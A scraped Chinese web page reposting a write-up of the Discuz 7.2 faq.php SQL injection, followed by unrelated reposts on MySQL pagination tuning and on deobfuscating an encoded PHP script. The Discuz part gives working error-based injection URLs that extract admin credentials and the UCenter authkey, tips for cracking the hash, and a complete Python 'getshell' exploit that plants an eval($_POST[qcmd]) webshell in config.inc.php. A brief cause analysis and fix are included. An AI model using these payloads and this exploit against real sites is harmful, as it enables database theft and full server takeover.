您的当前位置：首页正文

discuz /faq.php SQL Injection Vul

2023-11-08 来源：东饰资讯网

. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考

1. 漏洞描述

1. 通过获取管理员密码 2. 对管理员密码进行破解。通过在cmd5.com网站对管理密码进行查询，需要带salt，获取的salt要去掉最后一个数字"1"例如下面获取: admin:c6c45f444cf6a41b309c9401ab9a55a7:066ff71需要查询的是: c6c45f444cf6a41b309c9401ab9a55a7:066ff73. 通过uc_key获取shell4. 进入后台，添加插件获取webshell

Relevant Link:

http://sebug.net/vuldb/ssvid-87115http://sebug.net/vuldb/ssvid-87114

2. 漏洞触发条件

1.获取数据库版本信息http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=‘&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 2.获取管理员账户密码http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23 3.获取keyhttp://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=‘&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23//通过error based injection报错获得注入信息

0x1: POC

import sys,urllib,time,math,base64,hashlib,urllib2#contant rawdef fg(kaishi, jieshu, wenben): start = wenben.find(kaishi); if start >= 0: start += len(kaishi); jieshu = wenben.find(jieshu, start); if jieshu >= 0: return wenben[start:jieshu].strip();#microtimedef microtime(get_as_float = False) : if get_as_float: return time.time(); else: return ‘%.8f %d‘ % math.modf(time.time());#authgetdef get_authcode(string, key = ‘‘): ckey_length = 4; key = hashlib.md5(key).hexdigest(); keya = hashlib.md5(key[0:16]).hexdigest(); keyb = hashlib.md5(key[16:32]).hexdigest(); keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]; #keyc = (hashlib.md5(‘0.736000 1389448306‘).hexdigest())[-ckey_length:] cryptkey = keya + hashlib.md5(keya+keyc).hexdigest(); key_length = len(cryptkey); string = ‘0000000000‘ + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string; string_length = len(string); result = ‘‘; box = range(0, 256); rndkey = dict(); for i in range(0,256): rndkey[i] = ord(cryptkey[i % key_length]); j=0; for i in range(0,256): j = (j + box[i] + rndkey[i]) % 256; tmp = box[i]; box[i] = box[j]; box[j] = tmp; a=0; j=0; for i in range(0,string_length): a = (a + 1) % 256; j = (j + box[a]) % 256; tmp = box[a]; box[a] = box[j]; box[j] = tmp; result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])); return keyc + base64.b64encode(result).replace(‘=‘, ‘‘);#getshell def get_shell(url0,key,host): headers={‘Accept-Language‘:‘zh-cn‘, ‘Content-Type‘:‘application/x-www-form-urlencoded‘, ‘User-Agent‘:‘Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)‘, ‘Referer‘:url0 }; tm = time.time()+10*3600; tm="time=%d&action=updateapps" %tm; code = urllib.quote(get_authcode(tm,key)); url0=url0+"?code="+code; data1=‘‘‘<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">http://xxx‘);eval($_POST[qcmd]);//</item> </root>‘‘‘; try: req=urllib2.Request(url0,data=data1,headers=headers); ret=urllib2.urlopen(req); except: return "error to read"; data2=‘‘‘<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">http://aaa</item> </root>‘‘‘; try: req=urllib2.Request(url0,data=data2,headers=headers); ret=urllib2.urlopen(req); except: return "error"; return "OK: "+host+"/config.inc.php | Password = qcmd"; #去掉/config/uc_config.php 为config.inc.php by niubl#define over#url from usersright = len(sys.argv);if right < 2: #note print ("============================================================"); print ("Discuz <= 7.2 Getshell"); print ("Wrote by Airbasic"); print ("Usage: py.exe " + sys.argv[0] + " http://localhost/dz"); print ("============================================================"); raw_input(""); sys.exit()url = sys.argv[1]; #gourl1 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";url2 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";#authkey1~31wy1 = urllib.urlopen(url1);nr1 = wy1.read();authkey1 = fg("‘1:","‘ for",nr1);#authkey32~64wy2 = urllib.urlopen(url2);nr2 = wy2.read();authkey2 = fg("‘1:","‘ for",nr2);#authkeyauthkey = authkey1+authkey2;#get username and password#none#over#get webshellurl0 = url + "/api/uc.php";host = url;print ("Wrote by Airbasic , GetShell Ok !");print get_shell(url0,authkey,host);raw_input("");

Relevant Link:

http://blog.csdn.net/yiyefangzhou24/article/details/36913287http://qqhack8.blog.163.com/blog/static/11414798520146711246279/

3. 漏洞影响范围4. 漏洞代码分析

/faq.php

..elseif($action == ‘grouppermission‘) { .. //首先定义一个数组groupids，然后遍历$gids(这也是个数组，就是$_GET[gids]) $groupids = array(); foreach($gids as $row) { //将数组中的所有值的第一位取出来放在groupids中 $groupids[] = $row[0]; /* 这里的安全漏洞在于 discuz在全局会对GET数组进行addslashes转义，也就是说会将单引号"‘"转义成"‘" 所以，如果我们的传入的参数是: gids[1]=‘的话，会被转义成$gids[1]=‘，而这个赋值语句$groupids[] = $row[0]就相当于取了字符串的第一个字符，也就是""，把转义符号取出来了 */ } /* 在将数据放入sql语句前，通过implodeids函数对$groupids进行处理了一遍 就是将刚才的$groupids数组用‘,‘分割开，组成一个类似于‘1‘,‘2‘,‘3‘,‘4‘的字符串返回。但是我们的数组刚取出来一个转义符，它会将这里一个正常的‘转义掉，比如这样：‘1‘,‘‘,‘3‘,‘4‘ 这样就把原本的用于闭合的单引号给转义了，使得黑客的注入数据得以"逃逸"，也就是产生的注入，我们把报错语句放在3这个位置，就能报错 */ $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")"); $groups = array(); ..

Relevant Link:

http://simeon.blog.51cto.com/18680/1440000

5. 防御方法

/faq.php

elseif($action == ‘grouppermission‘) { /* 对$gids进行初始化 */ $gids = array(); /* */

Relevant Link:

http://www.crazydb.com/archive/Discuz7.xSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8EEXPhttp://simeon.blog.51cto.com/18680/1440000

6. 攻防思考

discuz /faq.php SQL Injection Vul

标签：

小编还为您整理了以下内容，可能对您也有帮助：

php+mysql优化，百万至千万级快速分页mysql性能到底能有多高

php+Mysql 优化，百万至千万级快速分页

MySql 性能到底能有多高？用了php半年多，真正如此深入的去思考这个问题还是从前天开始。有过痛苦有过绝望，到现在充满信心！MySql 这个数据库绝对是适合dba级的高手去玩的，一般做一点1万篇新闻的小型系统怎么写都可以，用xx框架可以实现快速开发。可是数据量到了10万，百万至千万，他的性能还能那么高吗？一点小小的失误，可能造成整个系统的改写，甚至更本系统无法正常运行！好了，不那么多废话了。用事实说话，看例子：

数据表 collect ( id, title ,info ,vtype) 就这4个字段，其中 title 用定长，info 用text, id 是逐渐，vtype是tinyint，vtype是索引。这是一个基本的新闻系统的简单模型。现在往里面填充数据，填充10万篇新闻。

最后collect 为 10万条记录，数据库表占用硬盘1.6G。OK ,看下面这条sql语句：

select id,title from collect limit 1000,10; 很快；基本上0.01秒就OK，再看下面的

select id,title from collect limit 90000,10; 从9万条开始分页，结果？

8-9秒完成，my god 哪出问题了？？？？其实要优化这条数据，网上找得到答案。看下面一条语句:

select id from collect order by id limit 90000,10; 很快，0.04秒就OK。为什么？因为用了id主键做索引当然快。网上的改法是：

select id,title from collect where id>=(select id from collect order by id limit 90000,1) limit 10;

这就是用了id做索引的结果。可是问题复杂那么一点点，就完了。看下面的语句

select id from collect where vtype=1 order by id limit 90000,10; 很慢，用了8-9秒！

到了这里我相信很多人会和我一样，有崩溃感觉！vtype 做了索引了啊？怎么会慢呢？vtype做了索引是不错，你直接 select id from collect where vtype=1 limit 1000,10; 是很快的，基本上0.05秒，可是提高90倍，从9万开始，那就是0.05*90=4.5秒的速度了。和测试结果8-9秒到了一个数量级。从这里开始有人提出了分表的思路，这个和discuz 论坛是一样的思路。思路如下：

建一个索引表： t (id,title,vtype) 并设置成定长，然后做分页，分页出结果再到 collect 里面去找info 。是否可行呢？实验下就知道了。

10万条记录到 t(id,title,vtype) 里，数据表大小20M左右。用

select id from t where vtype=1 order by id limit 90000,10; 很快了。基本上0.1-0.2秒可以跑完。为什么会这样呢？我猜想是因为collect 数据太多，所以分页要跑很长的路。limit 完全和数据表的大小有关的。其实这样做还是全表扫描，只是因为数据量小，只有10万才快。OK，来个疯狂的实验，加到100万条，测试性能。

加了10倍的数据，马上t表就到了200多M，而且是定长。还是刚才的查询语句，时间是0.1-0.2秒完成！分表性能没问题？错！因为我们的limit还是9万，所以快。给个大的，90万开始

select id from t where vtype=1 order by id limit 900000,10; 看看结果，时间是1-2秒！

why 　分表了时间还是这么长，非常之郁闷！有人说定长会提高limit的性能，开始我也以为，因为一条记录的长度是固定的，mysql 应该可以算出90万的位置才对啊？可是我们高估了mysql 的智能，他不是商务数据库，事实证明定长和非定长对limit影响不大？怪不得有人说 discuz到了100万条记录就会很慢，我相信这是真的，这个和数据库设计有关！

难道MySQL 无法突破100万的吗？？？到了100万的分页就真的到了极限？？？

答案是： NO !!!! 为什么突破不了100万是因为不会设计mysql造成的。下面介绍非分表法，来个疯狂的测试！一张表搞定100万记录，并且10G 数据库，如何快速分页！

好了，我们的测试又回到 collect表，开始测试结论是： 30万数据，用分表法可行，超过30万他的速度会慢道你无法忍受！当然如果用分表+我这种方法，那是绝对完美的。但是用了我这种方法后，不用分表也可以完美解决！

答案就是：复合索引！有一次设计mysql索引的时候，无意中发现索引名字可以任取，可以选择几个字段进来，这有什么用呢？开始的select id from collect order by id limit 90000,10; 这么快就是因为走了索引，可是如果加了where 就不走索引了。抱着试试看的想法加了 search(vtype,id) 这样的索引。然后测试

select id from collect where vtype=1 limit 90000,10; 非常快！0.04秒完成！

再测试: select id ,title from collect where vtype=1 limit 90000,10; 非常遗憾，8-9秒，没走search索引！

再测试：search(id,vtype)，还是select id 这个语句，也非常遗憾，0.5秒。

综上：如果对于有where 条件，又想走索引用limit的，必须设计一个索引，将where 放第一位，limit用到的主键放第2位，而且只能select 主键！

完美解决了分页问题了。可以快速返回id就有希望优化limit ，按这样的逻辑，百万级的limit 应该在0.0x秒就可以分完。看来mysql 语句的优化和索引时非常重要的！

好了，回到原题，如何将上面的研究成功快速应用于开发呢？如果用复合查询，我的轻量级框架就没的用了。分页字符串还得自己写，那多麻烦？这里再看一个例子，思路就出来了：

select * from collect where id in (9000,12,50,7000); 竟然 0秒就可以查完！

mygod ，mysql 的索引竟然对于in语句同样有效！看来网上说in无法用索引是错误的！

有了这个结论，就可以很简单的应用于轻量级框架了：

代码如下：

$db=dblink();

$db->pagesize=20;

$sql="select id from collect where vtype=$vtype";

$db->execute($sql);

$strpage=$db->strpage(); //将分页字符串保存在临时变量，方便输出

while($rs=$db->fetch_array()){

$strid.=$rs['id'].',';

}

$strid=substr($strid,0,strlen($strid)-1); //构造出id字符串

$db->pagesize=0; //很关键，在不注销类的情况下，将分页清空，这样只需要用一次数据库连接，不需要再开；

$db->execute("select id,title,url,sTime,gTime,vtype,tag from collect where id in ($strid)");

< php while($rs=$db->fetch_array()): >

<tr>

<td$amp;>amp;$amp;nbsp;< php echo $rs['id']; $amp;>amp;$lt;/td>

<td$amp;>amp;$amp;nbsp;< php echo $rs['url']; $amp;>amp;$lt;/td>

<td$amp;>amp;$amp;nbsp;< php echo $rs['sTime']; $amp;>amp;$lt;/td>

<td$amp;>amp;$amp;nbsp;< php echo $rs['gTime']; $amp;>amp;$lt;/td>

<td$amp;>amp;$amp;nbsp;< php echo $rs['vtype']; $amp;>amp;$lt;/td>

<td$amp;>amp;$amp;nbsp;<a act=show&id=< php echo $rs['id']; $amp;>quot;$ target="_blank"$amp;>amp;$lt; php echo $rs['title']; $amp;>amp;$lt;/a$amp;>amp;$lt;/td>

<td$amp;>amp;$amp;nbsp;< php echo $rs['tag']; $amp;>amp;$lt;/td>

</tr>

< php endwhile; >

</table>

< php

echo $strpage;

通过简单的变换，其实思路很简单：1）通过优化索引，找出id，并拼成 "123,90000,12000" 这样的字符串。2）第2次查询找出结果。

小小的索引+一点点的改动就使mysql 可以支持百万甚至千万级的高效分页！

通过这里的例子，我反思了一点：对于大型系统，PHP千万不能用框架，尤其是那种连sql语句都看不到的框架！因为开始对于我的轻量级框架都差点崩溃！只适合小型应用的快速开发，对于ERP,OA，大型网站，数据层包括逻辑层的东西都不能用框架。如果程序员失去了对sql语句的把控，那项目的风险将会成几何级数增加！尤其是用mysql 的时候，mysql 一定需要专业的dba 才可以发挥他的最佳性能。一个索引所造成的性能差别可能是上千倍！

PS: 经过实际测试，到了100万的数据，160万数据，15G表，190M索引，就算走索引，limit都得0.49秒。所以分页最好别让别人看到10万条以后的数据，要不然会很慢！就算用索引。经过这样的优化，mysql到了百万级分页是个极限！但有这样的成绩已经很不错，如果你是用sqlserver肯定卡死！而 160万的数据用 id in (str) 很快，基本还是0秒。如果这样，千万级的数据，mysql应该也很容易应付。

php脚本加密，求解密方法，或者帮我解一下，

首先调整格式，方便查看：

$OOO0O0O00=__FILE__;

$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');

$OO00O0000=196900;

$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};

$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};

$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};

$O0O0000O0='OOO0000O0';

echo(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMTgyKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDY5MiksJzFBNDBDbHZVTXBzNkhLekxYVlJjdG0vT2phaWczZjlaR3lFeEprQlRvUHIrTkZuMkllcWRRWWJ3N2hEdVM4VzU9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));

return;

我们注意到，关键是echo后面的那个变量，先输出看看：

$OOO0O0O00=__FILE__;

$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');

$OO00O0000=196900;

$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};

$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};

$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};

$O0O0000O0='OOO0000O0';

exit($$O0O0000O0); //这里的$$O0O0000O0，就是下一行中的变量

return;

得到结果：base64_decode

所以，我们判断，下面的这一段代码是在解码一段base64编码的字符，我们再来看看解码之后是什么东东。去掉前面的exit,并且将现在的echo直接改成exit：

$OOO0O0O00=__FILE__;

$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');

$OO00O0000=196900;

$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};

$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};

$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};

$O0O0000O0='OOO0000O0';

exit(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMTgyKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDY5MiksJzFBNDBDbHZVTXBzNkhLekxYVlJjdG0vT2phaWczZjlaR3lFeEprQlRvUHIrTkZuMkllcWRRWWJ3N2hEdVM4VzU9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));

return;

得到输出：

$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};$OO0OO000O($O000O0O00,1182);$OO00O00O0=($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,692),'1A40ClvUMps6HKzLXVRctm/Ojaig3f9ZGyExJkBToPr+NFn2IeqdQYbw7hDuS8W5=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);

好的，我们看出，这个又是一段加密的代码。是由原来的echo来的，那么我们就用这段代码替换原来的echo 那部分代码：

$OOO0O0O00=__FILE__;

$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');

$OO00O0000=196900;

$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};

$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};

$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};

$O0O0000O0='OOO0000O0';

$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};

if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');

$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};

$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};

$OO0OO000O($O000O0O00,1182);

$OO00O00O0=($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,692),'1A40ClvUMps6HKzLXVRctm/Ojaig3f9ZGyExJkBToPr+NFn2IeqdQYbw7hDuS8W5=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));

eval($OO00O00O0);

return;

好了，接近结果已经很近了！我们再看这段代码，注意最后，有个eval函数，eval函数能将普通的字符串当做是PHP代码进行执行，那么可以断定，在eval函数中，是一段真正执行的字符串型的PHP代码。而eval函数中的变量就是它上面的那一行的变量，，我们查看上面那个是什么，分别用exit输出上面那个变量等号右边的各个变量，得到：

$OOO0O0O00=__FILE__;

$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');

$OO00O0000=196900;

$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};

$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};

$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};

$O0O0000O0='OOO0000O0';

$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};

if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');

$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};

$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};

$OO0OO000O($O000O0O00,1182);

$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,692),'1A40ClvUMps6HKzLXVRctm/Ojaig3f9ZGyExJkBToPr+NFn2IeqdQYbw7hDuS8W5=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));

eval($OO00O00O0);

return;

还存在一个变量我们没直接替换，因为我们在用exit时，它输出的是一个资源句柄，那么我们继续向上找，找它的定义语句（利用编辑器的Ctrl+F查找，得到它是在if(!0)后面的那句，现在再exit后面的那个语句中的变量）得到：

if(!0)$O000O0O00=fopen($OOO0O0O00,'rb');

这当中右边的变量定义，同样在第一行找到了：

$OOO0O0O00=__FILE__;

好了，现在基本上我们已经找到了相关的所有的代码了，精简一下：

$OOO0O0O00=__FILE__;

if(!0)$O000O0O00=fopen($OOO0O0O00,'rb');

$OO00O00O0=(base64_decode(strtr(fread($O000O0O00,692),'1A40ClvUMps6HKzLXVRctm/Ojaig3f9ZGyExJkBToPr+NFn2IeqdQYbw7hDuS8W5=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));

eval($OO00O00O0);

return;

接下来就是继续将eval换成exit,再替换，最后不再出现eval就对了

我测试了一下你这个页面，貌似没有什么结果，以前我解码过别人的一个Discuz插件，就是这样弄的!简单总结：加密时，利用数字0，字母O的大写，字母o的小写这三个字符的相似性来命名变量，再通过多次的base64编码和字符截取来实现加密；而解密就是利用程序自己阅读自己的程序输出结果，再截取字符串，将字符串base64解码，最后利用eval函数执行字符串完成。人工解码的主要工作就是不断的用exit替换eval,再覆盖源码，直到不再有eval为止。最后打印的结果就是程序明文源码。

网上有很详细的教程，你百度试试。我以前也是在网上看见的。